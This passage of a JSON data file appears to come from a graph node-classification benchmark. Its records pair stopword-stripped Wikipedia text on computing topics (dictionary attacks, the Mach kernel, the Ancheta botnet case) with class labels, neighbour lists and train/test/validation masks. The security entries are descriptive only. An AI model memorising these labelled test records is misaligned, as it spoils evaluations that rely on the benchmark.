      7730,
      10806,
      2110,
      577,
      7754,
      8779,
      10315,
      8273,
      11349,
      1623,
      1114,
      10332,
      10341,
      618,
      1654,
      8827,
      9854,
      3717,
      658,
      1683,
      660,
      1173,
      10389,
      2716,
      4772,
      169,
      7857,
      9403,
      6863,
      7887,
      3282,
      10963,
      212,
      2265,
      733,
      6877,
      2274,
      229,
      6905,
      6909,
      7426,
      6916,
      8978,
      4389,
      6954,
      3886,
      2357,
      1847,
      9528,
      11067,
      6975,
      8513,
      6466,
      9541,
      9556,
      4956,
      9052,
      3937,
      9569,
      1898,
      881,
      11639,
      7034,
      10107,
      892,
      2430,
      7557,
      11144,
      2957,
      3984,
      7056,
      1429,
      1941,
      3477,
      10135,
      10658,
      10662,
      11185,
      1970,
      11198,
      4036,
      4552,
      9170,
      7635,
      6617,
      7643,
      6621,
      9697,
      8674,
      4580,
      8171,
      4081,
      7161,
      3581
    ],
    "mask": "None"
  },
  {
    "node_id": 7557,
    "label": 4,
    "text": "Dictionary_attack:dictionary attack cryptanalysis computer security dictionary attack form brute force attack technique defeating cipher authentication mechanism trying determine decryption key passphrase trying hundreds sometimes millions likely possibilities words dictionary dictionary attack based trying strings pre-arranged listing typically derived list words dictionary hence phrase dictionary attack contrast brute force attack large proportion key space searched systematically dictionary attack tries possibilities deemed likely succeed dictionary attacks often succeed many people tendency choose short passwords ordinary words common passwords simple variants obtained example appending digit punctuation character dictionary attacks relatively easy defeat e.g using passphrase otherwise choosing password simple variant word found dictionary listing commonly used passwords possible achieve time–space tradeoff pre-computing list hashes dictionary words storing database using hash key requires considerable amount preparation time allows actual attack executed faster storage requirements pre-computed tables major cost less issue today low cost disk storage pre-computed dictionary attacks particularly effective large number passwords cracked pre-computed dictionary need generated completed password hashes looked almost instantly time find corresponding password refined approach involves use rainbow tables reduce storage requirements cost slightly longer lookup-times see lm hash example authentication system compromised attack pre-computed dictionary attacks rainbow table attacks thwarted use salt technique forces hash dictionary recomputed password sought making precomputation infeasible provided number possible salt values large enough",
    "neighbors": [
      7426,
      6916,
      3717,
      7556,
      11144,
      3984,
      1941,
      1429,
      535,
      3477,
      4373,
      2716,
      5404,
      10915,
      4772,
      9640,
      4140,
      3382,
      7863,
      6712,
      8632,
      7354,
      10300,
      3133,
      6975,
      8513,
      2430,
      6466,
      733,
      7135,
      3937,
      2274,
      4580,
      7525,
      8827,
      2429,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7558,
    "label": 9,
    "text": "Charity_(programming_language):charity programming language charity experimental purely functional programming language developed university calgary supervision robin cockett based ideas hagino tatsuya completely grounded category theory disregarding interactions outside world charity programs guaranteed terminate stay productive “ charity interesting exercise non-turing-complete programming languages capable expressing ackermann function alas seems active last 10 years though would interest anyone interested seeing far one take non-tc language ” links added shown examples include also solving tower hanoi problem source charity also related total functional programming languages language allows ordinary recursive data types might found ml required finite corecursive data types allowed potentially infinite control structure operating recursive data types primitive recursion paramorphism control structure corecursive data types primitive co-recursion apomorphism neither control structure operate kind data paramorphisms terminate apomorphisms productive",
    "neighbors": [
      9345,
      10436,
      8262,
      10953,
      12,
      7983,
      8976,
      823,
      7386
    ],
    "mask": "Test"
  },
  {
    "node_id": 7559,
    "label": 4,
    "text": "Hylemetry:hylemetry term hylemetry modern day parlance refers type banknote authentication invented g. schirripa spagnolo 2008 used first time international context 2010 hylemetric approach based biometry identification unique random characteristic used create template uniquely identifying object hylemetric identification requires properties unique permanent measurable non-invasive i.e. characteristics measured without modifying anything typical example security metallic fibers distributed inside banknotes composition two greek words hyle metros aristotle used term ὕλη hyle mean non-living matter since biometric identification given excellent results comes naturally apply similar criteria uniquely identify “ non-living matter ” banknotes hylemetric approach based biometry identification unique random characteristic used create template uniquely identifying object theory every random irreproducible characteristic could used hylemetric identification however valid feature also needs following properties typical example security metallic fibers distributed inside banknotes seen image right put inside paper pulp making banknote paper distribution number absolutely random possible create hylemetric template uniquely identifies particular banknote starting analysis fibers distribution approach also valid non-living matter identified one correct characteristics",
    "neighbors": [
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 7560,
    "label": 4,
    "text": "Malware_analysis:malware analysis malware analysis study process determining functionality origin potential impact given malware sample virus worm trojan horse rootkit backdoor malware malicious software computer software intended harm host operating system steal sensitive data users organizations companies malware may include software gathers user information without permission three typical use cases drive need malware analysis method malware analysis performed typically falls one two types examining malicious software involves several stages including limited following note hosted sandboxes malwr use one products hood malwr uses cuckoo",
    "neighbors": [
      7968,
      1251,
      5475,
      5891,
      8580,
      9319,
      1896,
      4441,
      10213,
      4972,
      6288,
      1622,
      1017,
      7515,
      10173
    ],
    "mask": "Test"
  },
  {
    "node_id": 7561,
    "label": 3,
    "text": "Mach_(kernel):mach kernel mach kernel developed carnegie mellon university support operating system research primarily distributed parallel computing mach often mentioned one earliest examples microkernel however versions mach microkernels mach derivatives basis modern operating system kernels gnu hurd apple operating systems macos ios ipados tvos watchos project carnegie mellon ran 1985 1994 ending mach 3.0 true microkernel mach developed replacement kernel bsd version unix new operating system would designed around mach derivatives exist within number commercial operating systems include using xnu operating system kernel incorporates earlier non-microkernel mach major component mach virtual memory management system also adopted 4.4bsd bsd developers csrg appears modern bsd-derived unix systems freebsd mach logical successor carnegie mellon accent kernel lead developer mach project richard rashid working microsoft since 1991 various top-level positions revolving around microsoft research division another original mach developers avie tevanian formerly head software next chief software technology officer apple inc. march 2006 mach name mach evolved euphemization spiral developers naming phase bike lunch rainy pittsburgh mud puddles tevanian joked word muck could serve backronym multi-user multiprocessor universal communication kernel italian cmu engineer dario giuse later asked project leader rick rashid project current title received muck answer though spelled pronounced according italian alphabet wrote mach rashid liked giuse spelling mach much prevailed key concept original unix operating system idea pipe pipe abstraction allowed data moved unstructured stream bytes program program using pipes users programmers could link together multiple programs complete tasks feeding data several small programs turn contrasted typical operating systems era required single large program could handle entire task alternately used files pass data resource expensive time consuming pipes built underlying input/output system system turn based model drivers expected periodically block waited tasks complete instance printer driver might send line text line printer nothing printer completed printing line case driver would indicate blocked operating system would allow program run printer indicated ready data pipes system limited resource memory one program filled memory assigned pipe would naturally block normally would cause consuming program run emptying pipe contrast file entire file read written next program use pipes made movement data across multiple programs occur piecemeal fashion without programmer intervention however implementation pipes memory buffers meant data copied program program time consuming resource intensive operation made pipe concept unsuitable tasks quick turnaround low latency needed case device drivers operating system kernel core functionality instead written single large program operating system added new functionality computer networking instance size complexity kernel grew unix pipes offered conceptual system could used build arbitrarily complex solutions small interacting programs smaller programs easy program maintain well defined interfaces simplified programming debugging qualities even valuable device drivers small size bug-free performance extremely important strong desire model kernel basis small interacting programs one first systems use pipe-like system basis operating system aleph kernel developed university rochester introduced concept ports essentially shared memory implementation aleph kernel reduced providing access hardware including memory ports conventional programs using ports system implemented behavior device drivers user programs concept greatly reduced size kernel allowed users experiment different drivers simply loading connecting together runtime greatly eased problems developing new operating system code otherwise generally required machine restarted general concept small kernel external drivers became known microkernel aleph implemented data general eclipse minicomputers tightly bound machine far ideal required memory copied programs involved considerable performance overhead also quite expensive nevertheless aleph proved basis system sound went demonstrate computer clustering copying memory early ethernet interface around time new generation central processors cpus coming market offering 32-bit address spaces initially optional support memory management unit mmu mmu handled instructions needed implement virtual memory vm system keeping track pages memory use various programs offered new solution port concept using copy write mechanism used vm instead copying data programs sent data needed instruct mmu provide access memory system would implement interprocess communications system dramatically higher performance concept picked carnegie-mellon adapted aleph perq workstation implemented using copy-on-write port successful resulting accent kernel limited practical use run existing software moreover accent tightly tied perq aleph eclipse major change experimental kernels mach decision make version existing 4.2bsd kernel re-implemented accent message-passing concepts kernel would binary compatible existing bsd software making system immediately useful everyday use still useful experimental platform additionally new kernel would designed start support multiple processor architectures even allowing heterogeneous clusters constructed order bring system quickly possible system would implemented starting existing bsd code re-implementing bit bit inter-process communication-based ipc-based programs thus mach would begin monolithic system similar existing unix systems evolve toward microkernel concept time mach started largely effort produce cleanly defined unix-based highly portable accent result short list generic concepts mach developed accent ipc concepts made system much unix-like nature even able run unix programs little modification mach introduced concept port representing endpoint two-way ipc ports security rights like files unix allowing unix-like model protection applied additionally mach allowed program handle privileges would normally given operating system order allow user space programs handle things like interacting hardware mach like unix operating system becomes primarily collection utilities unix mach keeps concept driver handling hardware therefore drivers present hardware included microkernel architectures based hardware abstraction layer exokernels could move drivers microkernel main difference unix instead utilities handling files handle task operating system code moved kernel user space resulting much smaller kernel rise term microkernel unlike traditional systems mach process task consist number threads common modern systems mach first system define tasks threads way kernel job reduced essentially operating system maintaining utilities scheduling access hardware existence ports use ipc perhaps fundamental difference mach traditional kernels unix calling kernel consists operation known system call trap program uses library place data well known location memory causes fault type error system first started kernel set handler faults program causes fault kernel takes examines information passed carries instructions mach ipc system used role instead order call system functionality program would ask kernel access port use ipc system send messages port although messages triggered system calls would kernels mach pretty much kernel did—handling actual request would program thread concurrency support benefited message passing ipc mechanisms since tasks consisted multiple code threads mach could freeze unfreeze message handling allowed system distributed multiple processors either using shared memory directly mach messages adding code copy message another processor needed traditional kernel difficult implement system sure different programs n't try write memory different processors however mach ports process memory access make well defined easy implement made first-class citizen system ipc system initially performance problems strategies developed minimize impact like predecessor accent mach used single shared-memory mechanism physically passing message one program another physically copying message would slow mach relies machine memory management unit mmu quickly map data one program another data written would physically copied process called copy-on-write messages also checked validity kernel avoid bad data crashing one many programs making system ports deliberately modeled unix file system concepts allowed user find ports using existing file system navigation concepts well assigning rights permissions would file system development system would easier would code worked exist traditional program could built using existing tools could also started debugged killed using tools monokernel bug new code would take entire machine require reboot whereas mach would require program restarted additionally user could tailor system include exclude whatever features required since operating system simply collection programs could add remove parts simply running killing would program finally mach features deliberately designed extremely platform neutral quote one text mach number disadvantages however relatively mundane one clear find ports unix problem solved time programmers agreed number well known locations file system serve various duties approach worked mach ports well mach operating system assumed much fluid ports appearing disappearing time without mechanism find ports services represented much flexibility would lost mach initially hosted additional code written directly existing 4.2bsd kernel allowing team work system long complete work started already functional accent ipc/port system moved key portions os tasks threads virtual memory portions completed various parts bsd system re-written call mach change 4.3bsd also made process 1986 system complete point able run dec vax although little practical value goal making microkernel realized soon followed versions ibm rt pc sun microsystems 68030-based workstations proving system portability 1987 list included encore multimax sequent balance machines testing mach ability run multiprocessor systems public release 1 made year release 2 followed next year throughout time promise true microkernel yet delivered early mach versions included majority 4.3bsd kernel system known poe server resulting kernel actually larger unix based idea however move unix layer kernel user-space could easily worked even replaced outright unfortunately performance proved major problem number architectural changes made order solve problem unwieldy unix licensing issues also plaguing researchers early effort provide non-licensed unix-like system environment continued find use well development mach resulting mach 3 released 1990 generated intense interest small team built mach ported number platforms including complex multiprocessor systems causing serious problems older-style kernels generated considerable interest commercial market number companies midst considering changing hardware platforms existing system could ported run mach would seem would easy change platform underneath mach received major boost visibility open software foundation osf announced would hosting future versions osf/1 mach 2.5 investigating mach 3 well mach 2.5 also selected nextstep system number commercial multiprocessor vendors mach 3 led number efforts port operating systems parts microkernel including ibm workplace os several efforts apple build cross-platform version classic mac os mach originally intended replacement classical monolithic unix reason contained many unix-like ideas instance mach used permissioning security system patterned unix file system since kernel privileged running kernel-space os servers software possible malfunctioning malicious programs send commands would cause damage system reason kernel checked every message validity additionally operating system functionality located user-space programs meant needed way kernel grant programs additional privileges operate hardware instance mach esoteric features also based ipc mechanism instance mach able support multi-processor machines ease traditional kernel extensive work needs carried make reentrant interruptible programs running different processors could call kernel time mach bits operating system isolated servers able run like program processor although theory mach kernel would also reentrant practice n't issue response times fast simply wait serve requests turn mach also included server could forward messages programs even network area intense development late 1980s early 1990s unfortunately use ipc almost tasks turned serious performance impact benchmarks 1997 hardware showed mach 3.0-based unix single-server implementations 50 slower native unix study exact nature performance problems turned number interesting facts one ipc problem overhead associated memory mapping needed support added small amount time making call rest 80 time spent due additional tasks kernel running messages primary among port rights checking message validity benchmarks 486dx-50 standard unix system call took average 21μs complete equivalent operation mach ipc averaged 114μs 18μs hardware related rest mach kernel running various routines message given syscall nothing full round-trip bsd would require 40μs whereas user-space mach system would take 500μs mach first seriously used 2.x versions performance slower traditional monolithic operating systems perhaps much 25 cost considered particularly worrying however system also offering multi-processor support easy portability many felt expected acceptable cost pay mach 3 attempted move operating system user-space overhead became higher still benchmarks mach ultrix mips r3000 showed performance hit great 67 workloads example getting system time involves ipc call user-space server maintaining system clock caller first traps kernel causing context switch memory mapping kernel checks caller required access rights message valid another context switch memory mapping complete call user-space server process must repeated return results adding total four context switches memory mappings plus two message verifications overhead rapidly compounds complex services often code paths passing many servers source performance problems another centered problems trying handle memory properly physical memory ran low paging occur traditional monolithic operating systems authors direct experience parts kernel called others allowing fine-tune pager avoid paging code used mach n't possible kernel real idea operating system consisted instead use single one-size-fits-all solution added performance problems mach 3 attempted address problem providing simple pager relying user-space pagers better specialization turned little effect practice benefits wiped expensive ipc needed call performance problems related mach support multiprocessor systems mid-1980s early 1990s commodity cpus grew performance rate 60 year speed memory access grew 7 year meant cost accessing memory grew tremendously period since mach based mapping memory around programs cache miss made ipc calls slow ipc overhead major issue mach 3 systems however concept multi-server operating system still promising though still requires research developers careful isolate code modules call server server instance majority networking code would placed single server thereby minimizing ipc normal networking tasks developers instead stuck original poe concept single large server providing operating system functionality order ease development allowed operating system server run either user-space kernel-space allowed develop user-space advantages original mach idea move debugged server kernel-space order get better performance several operating systems since constructed using method known co-location among lites mklinux osf/1 nextstep/openstep/macos chorus microkernel made feature basic system allowing servers raised kernel space using built-in mechanisms mach 4 attempted address problems time radical set upgrades particular found program code typically writable potential hits due copy-on-write rare thus made sense map memory programs ipc instead migrate program code used local space program led concept shuttles seemed performance improved developers moved system semi-usable state mach 4 also introduced built-in co-location primitives making part kernel mid-1990s work microkernel systems largely stagnant although market generally believed modern operating systems would microkernel based 1990s primary remaining widespread uses mach kernel apple macos sibling ios run atop heavily modified hybrid open software foundation mach kernel osfmk 7.3 called xnu also used osf/1 xnu file systems networking stacks process memory management functions implemented kernel file system networking process memory management functions invoked user mode via ordinary system calls rather message passing xnu mach messages used communication user-mode processes requests user-mode code kernel kernel user-mode servers analysis demonstrated ipc performance problem obvious seemed recall single-side syscall took 20μs bsd 114μs mach running system 114 11 due context switch identical bsd additional 18 used mmu map message user-space kernel space adds 29μs longer traditional syscall much rest majority actual problem due kernel performing tasks checking message port access rights would seem important security concern fact makes sense unix-like system instance single-user operating system running cell phone robot might need features exactly sort system mach pick-and-choose operating system would valuable likewise mach caused problems memory moved operating system another task really makes sense system one address space dos early mac os single large address space shared programs systems mapping provide benefits realizations led series second generation microkernels reduced complexity system placed almost functionality user space instance l4 kernel version 2 includes seven system calls uses 12k memory whereas mach 3 includes 140 functions uses 330k memory ipc calls l4 486dx-50 take 5μs faster unix syscall system 20 times fast mach course ignores fact l4 handling permissioning security leaving user-space programs select much little overhead require potential performance gains l4 tempered fact user-space applications often provide many functions formerly supported kernel order test end-to-end performance mklinux co-located mode compared l4 port running user-space l4 added 5 –10 overhead compared mach 29 newer microkernels revitalized industry whole projects gnu hurd received new attention result following list operating system kernels derived mach operating systems kernels derived mach",
    "neighbors": [
      5120,
      3082,
      2061,
      7187,
      546,
      8754,
      9784,
      10809,
      10813,
      576,
      1101,
      10851,
      9320,
      6250,
      4092,
      3197,
      7806,
      2179,
      5771,
      7307,
      4251,
      6300,
      9374,
      7337,
      8877,
      3248,
      2761,
      8395,
      9931,
      8909,
      3286,
      10971,
      5855,
      9452,
      1776,
      242,
      5363,
      2804,
      8441,
      3323,
      5889,
      8976,
      11539,
      10016,
      1839,
      2864,
      7983,
      2363,
      7483,
      6974,
      7497,
      8012,
      2392,
      5976,
      350,
      2925,
      11123,
      5492,
      3969,
      3974,
      7561,
      7057,
      11689,
      11180,
      10680,
      5049,
      8633,
      9151,
      9665,
      8147,
      8661,
      9176,
      3551,
      8671,
      1508,
      5093,
      998,
      4073,
      6638,
      2545,
      5619,
      11257,
      8700
    ],
    "mask": "Train"
  },
  {
    "node_id": 7562,
    "label": 9,
    "text": "Scheme_48:scheme 48 scheme 48 programming language dialect language scheme implementation using interpreter emits bytecode foreign function interface calling functions language c comes library regular expressions regex interface portable operating system interface posix supported portable scheme library slib basis scheme shell scsh used academic research free open-source software released bsd license called scheme 48 first version written 48 hours august 1986 authors say intended understood 48 hours scheme 48 uses virtual machine interpret bytecode written restricted dialect scheme called prescheme translated c compiled native binary prescheme pre-scheme statically-typed dialect scheme efficiency low-level machine access c retaining many desirable features scheme",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      9320,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      5612,
      9714,
      7670,
      11255,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7563,
    "label": 7,
    "text": "HyTrust:hytrust hytrust american company specialising security compliance control software virtualization information technology infrastructure company founded 2007 based mountain view california hytrust founded 2009 partnered vmware symantec cisco systems citrix systems backed 5.5 million funding trident capital epic ventures 10.5 million funding raised granite ventures cisco systems 2010 summer 2013 company raised 18.5 million oversubscribed c round investments intel capital in-q-tel carahsoft fortinet previous investors web site also mentions mcafee trend micro ca technologies rsa vce hytrust founded company president eric chiu vice president renata budko vice president boris strongin engineer boris belov hytrust chiu budko worked cemaphore systems – company specialising disaster recovery microsoft exchange hytrust ceo chairman john de santis – formerly vice president cloud services vmware chairman ceo tricipher software security infrastructure company november 2013 hytrust acquired highcloud security cloud encryption management software provider acquisition added encryption key management hytrust products spring 2015 company raised 33 million series funding hytrust products based company patented intelligent security control system virtualized ecosystems hytrust cloudcontrol vmware vsphere-compatible virtual appliance sits virtual infrastructure administrators whenever administrative request submitted infrastructure appliance determines whether request complies organization security policies permitting denying accordingly logging requests records produced used regulatory compliance auditing troubleshooting forensic analysis company also provides private cloud logging active directory root access two-factor authentication vi segmentation host hardening multi-tenant policy enforcement secondary approval services encryption key management advises organizations manage virtualized cloud computing environments hytrust partnered intel 2014 create hytrust boundarycontrol technology lets companies set policies control access cloud virtualized data stored boundarycountrol designed work intel txt technology company released hytrust datacontrol 3.0 2015 technology encrypts data virtual machines rest keeps data secure used",
    "neighbors": [
      704,
      9569,
      4194,
      11233,
      5252,
      6153,
      2154,
      4049,
      6834,
      5371,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7564,
    "label": 4,
    "text": "United_States_v._Ancheta:united states v. ancheta united states america v. ancheta u.s. vs. ancheta 06-051 c.d cal name lawsuit jeanson james ancheta downey california u.s. government handled united states district court central district california first botnet related prosecution u.s history ancheta violated prohibited acts accessing transmitting malware intent consequence disrupting interstate foreign commerce case first prosecution united states america individual sentenced prison profiting use botnets used maliciously launch destructive denial service attacks sending large quantities spam across internet 57-month prison sentence ancheta longest history defendant spread malware ancheta pleaded guilty conspiring violate computer fraud abuse act causing damage computers used federal government united states national defence accessing protected computer without authorization purpose commit various types fraud dates june 25 2004 september 15 2004 los angeles county ancheta others knowingly conspired violate us code refers knowingly causing transmission program information code command result conduct cause damage without authorization computer used interstate foreign commerce communication cause loss one-year period aggregating least 5000 value secondly acheta others conspired violate us code refers access without authorization computer used interstate foreign commerce communication intentionally intimate transmission computer multiple commercial electronic email messages affect interstate foreign commerce finally ancheta charged laundering monetary instruments faced criminal forfeiture jeanson james ancheta time crime 20-year-old high school drop-out found rxbot software online decided going use create botnet army established set website would rent computer zombies hackers could employ fulfill whatever malicious job planned ancheta used least one computer system place residence accessed internet dial telephone line configure command botnet conduct business communication co-conspirator residing boca raton florida referred sobe also involved previous experience launching computer attacks internet bot program infects computer enables remote control computer security vulnerability computer system exploited hacker order install run malware case worm program installs set run background process daemon remains undetectable computer user infected computer often referred zombie computer ancheta depended building block botnet army ancheta engaged computers function unison network formation referred botnet controller called bot herder ancheta primary purpose engaging large numbers computers amplify attack reduce time taken execute greatest value provide relatively high level anonymity 2005 federal trade commission conjunction 35 government agencies organized initiative encourage internet service providers actively monitor identify quarantine customers whose computers appeared compromised transformed zombies appear remote control hackers one largest botnet implementations around time 2005 found dutch police botnet 1.5 million computers crime ring control zombie computers often employed response anti-spam laws spam filtering spammers started hiring virus writers hackers help architect armies zombie computers send spam email unsuspecting users computers around world february 2012 federal communications commission unveiled yet another plan calls internet service providers take specific steps combat online threats botnets july 2004 ancheta obtained access server internet hosting company set irc server utilizing ircd program created channel irc controlled remotely ancheta developed computer worm installed executed would report back irc channel controlled scan computers similar vulnerabilities leave open future unauthorized control ancheta initially developed worm modifying existing trojan called rxbot ddos attacks one use case botnets another major purpose use proxy server email spam propagation 2004 reported unsolicited email doubled late 2003 rising 310 billion message 700 billion messages worms like conficker originally found 2008 still remain threat significantly sophisticated disallowing updates communicated encrypted channels ancheta advertised sale bots purpose launching distributed denial-of-service ddos attacks send spam sold access bots clusters usually 10,000 time ancheta acted consultant advised buyer exact number bots would need successfully accomplish designated attack would offer separate channels additional cost assist control direction bots providing temporary control channel buyer around time crime estimated average botnet 20,000 computers size also profited sale developed worm would configure best propagation buyers also option using malware launch attack use worm offering ancheta accepted payments paypal would misleadingly describe nature transaction hosting web hosting dedicated box services total 17 different counts case count 1 violation refers conspiracy ancheta others commit offense defraud us agency violated us code counts 2 11 violation counts 2 3 4 involved intentionally causing damage accessing unauthorized computer belonging king pao electronic co sanyo electric software completed would caused damage exceeding 5000 launching distributed denial service ddos attack company whose name remains confidential completed would caused damage exceeding 5000 furtherance conspiracy ancheta committed various overt acts including payments accomplices directing numerous computers adware servers controlled ancheta servers unsuspecting users would redirected download malware counts 5 6 included knowingly causing transmission malicious code protected computers belonging naval air weapons station china lake us defense information systems agency used justice national defence national security naws china lake major navy research testing evaluation facility disa provides communication support president top executive staff us government count 7 11 violation ancheta knowingly accessed without authorization computers involved interstate foreign commerce installing adware without notice consent sole intent defraud 8,744 53,321 computers different count accessed without authorization monetary amounts 1306.52 7966.10 different count accepted payment services counts 12 16 violation knowing property involved financial transaction represents proceeds unlawful activity ancheta conducted financial transactions involved proceeds specified unlawful activity proceeds used intent promote unlawful activity proceeds selling worms rental botnet passed legitimate online transactions payments web hosting dedicated box services anchta also transferring payments internet hosting companies additional access servers used commit fraud november 2004 may 2005 varying amounts funds transferred wells fargo bank fdcservers sago networks count 17 violation ancheta required forfeit property involved offence included 2998.81 generated sale internet bots proxies deposited wells fargo account approximately 58,357.86 proceeds generated surreptitious install adware protected computers linked paypal account owned ancheta 1993 bmw 325 property used commit facilitate commission violations including desktop computers laptops hard drives",
    "neighbors": [
      2409,
      877,
      11437,
      4883,
      4725,
      2041,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 7565,
    "label": 6,
    "text": "Davfs2:davfs2 computer networking davfs2 linux tool connecting webdav shares though local disks open-source gpl-licensed file system mounting webdav servers communicating kernel davfs2 either use fuse file system api coda network file system protocol sockets davfs2 uses neon webdav library communicating web server davfs2 e.g used apache web server subversion installations",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      823,
      4919,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      8671,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 7566,
    "label": 2,
    "text": "IGUANA_Computing:iguana computing independent group unix-alikes networking activists iguana developers wombat system iguana also operating system os personality provides set services memory management process protection iguana designed base provision operating system services embedded systems among others provides underlying os wombat version paravirtualised linux designed provide legacy support embedded systems wombat works combination kenge iguana also used along create qualcomm rex os designed cell phones",
    "neighbors": [
      6787,
      9863,
      6412,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      10813,
      9151,
      10436,
      4423,
      6369,
      5492,
      2424,
      633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7567,
    "label": 8,
    "text": "Apache_Traffic_Server:apache traffic server apache traffic server ats modular high-performance reverse proxy forward proxy server generally comparable nginx squid created inktomi distributed commercial product called inktomi traffic server inktomi acquired yahoo shortly yahoo released ts source apache apache incubator project july 2009 guest editor yahoo online publication ostatic stated yahoo uses ts production serve 30 billion objects per day sites like yahoo homepage yahoo sports mail finance april 21 2010 apache board accepted traffic server tlp graduating project incubation latest stable version 8.0.2 released january 29 2019 latest long-term support version 6.2.3 released august 4 2018. ats released two stable versions version 6 long-term support version ats version 8 latest stable release quarterly minor versions scheduled beginning version 4.0 releases considered stable production follow regular semantic versioning developer preview releases made instead git master branch considered preview quality times long-term support provided last minor version within major release one added year ats good support next generation http protocol v6.0.0 http/2 a.k.a h2 tls fast yet site scores 100 ats actively developed supported several large companies well many individual contributors ostatic post describes ts shipping ... http web proxy caching solution also ... server framework build fast servers protocols traffic server benchmarked handle 200,000 requests per second small objects cache talk 2009 cloud computing expo members yahoo ts team stated ts used production yahoo handle 400tb traffic per day using 150 commodity machines ostatic post describes ts product literally hundreds developer-years context cloud computing ts would sit conceptually edge cloud routing requests come yahoo used edge services shown graphic distributed 2009 cloud computing expo depicting yahoo private cloud architecture practical terms typical server configuration might use ts serve static content images javascript cascading style sheets css hypertext markup language html files route requests dynamic content web server apache http server",
    "neighbors": [
      6161,
      1047,
      8217,
      8735,
      11303,
      44,
      10800,
      6714,
      9789,
      7742,
      64,
      7233,
      7750,
      595,
      7261,
      8799,
      8294,
      8810,
      11376,
      2163,
      4725,
      6774,
      11386,
      10377,
      8860,
      8350,
      3746,
      3237,
      7338,
      9387,
      11439,
      6338,
      1222,
      4294,
      8408,
      8923,
      4837,
      8425,
      747,
      6379,
      6894,
      7430,
      8460,
      1296,
      7443,
      7457,
      8994,
      3877,
      1327,
      7983,
      4919,
      1851,
      7485,
      4419,
      4944,
      1363,
      865,
      2404,
      11111,
      9580,
      10611,
      1913,
      3966,
      11134,
      1920,
      3969,
      4485,
      3462,
      1937,
      11161,
      6555,
      11682,
      9125,
      10661,
      5047,
      4538,
      6074,
      1991,
      5066,
      8139,
      3545,
      9179,
      990,
      8671,
      10719,
      11235,
      5612,
      8691,
      7159,
      1018
    ],
    "mask": "None"
  },
  {
    "node_id": 7568,
    "label": 4,
    "text": "Outbound_content_compliance:outbound content compliance outbound content compliance outbound content security relatively new segment computer security field aims detect prevent outbound content violates policy organization and/or government regulations deals internal threats opposite traditional security solutions firewall anti-virus anti-spam etc dealing external threats therefore sometimes called inside-out security business environment purpose prevent confidential and/or private data leaks protected information may belong company customers us canada european countries enacted laws mandating protection types computer-based information us laws including related provisions sarbanes-oxley hipaa gramm-leach-bliley act interest segment heated string high-profile data breaches personal information millions people stolen endangered",
    "neighbors": [
      8998,
      2558,
      8471
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7569,
    "label": 5,
    "text": "GENA:gena gena stands general event notification architecture gena base defines http notification architecture transmits notifications http resources http resource could object might need send receive notification example distribution list buddy list print job etc defined internet-draft draft-cohen-gena-p-base-01.txt expired gena base client arbiter provides ability send receive notifications using http tcp/ip administratively scoped unreliable multicast udp provisions made use intermediary arbiters called subscription arbiters handle routing notifications intended destination july 13–14 1998 university california irvine convened wisen workshop internet-scale event notification event brought together number experts various fields included presentation gena josh cohen microsoft delegates showcased event notification architectures haggled requirements josh final slide includes bullet points gena implemented microsoft products wish collaborate agree standard gena comply interest event notification appears waned 1998 participants unable come common definitions required definition notification services protocols gena briefly considered use internet printing protocol found niche part universal plug play upnp architecture gena base client arbiter",
    "neighbors": [
      11413,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7570,
    "label": 5,
